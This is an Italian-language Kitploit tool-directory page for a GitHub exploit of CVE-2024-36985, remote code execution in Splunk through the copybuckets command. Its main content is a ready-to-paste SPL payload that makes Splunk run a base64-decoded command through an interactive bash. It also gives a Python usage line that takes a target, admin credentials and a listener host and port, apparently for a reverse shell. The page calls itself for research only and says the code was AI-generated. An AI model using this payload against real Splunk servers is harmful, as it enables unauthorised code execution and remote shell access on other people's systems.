Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-36985 — Exploit RCE di Splunk tramite l'uso di Copybuckets. Solo per ricerca sulle vulnerabilità. | Kitploit
Strumenti/GitHubGitHub/littlesurii/cve-2024-36985
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHublittlesurii/cve-2024-36985

CVE-2024-36985

Exploit RCE di Splunk tramite l'uso di Copybuckets. Solo per ricerca sulle vulnerabilità.

Vedi Repository
17 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-36985

Tutti i codici exploit sono generati da gemini.
Ruolo amministratore Splunk richiesto. Applicazione Splunk_archiver abilitata.
Puoi anche eseguire il seguente SPL nella ricerca per innescare l'RCE.

root@kitploit:~
| copybuckets data="{\"providers\": {\"pwn_provider\": {\"command.arg.0\": \"/opt/splunk/etc/apps/splunk_archiver/java-bin/jars/sudobash\", \"command.arg.1\": \"-c\", \"command.arg.2\": \"{echo,YOUR_BASE64_PAYLOAD_HERE}|{base64,-d}|{bash,-i}\"}}, \"vixes\": {\"pwn_vix\": {\"provider\": \"pwn_provider\"}}}"

Utilizzo

root@kitploit:~
python3 CVE-2024-36985.py -t TARGET_IP -u SPLUNK_ADMIN -p SPLUNK_PASS --lhost YOUR_KALI_UP --lport YOUR_LISTEN_PORT
Scarica lo strumento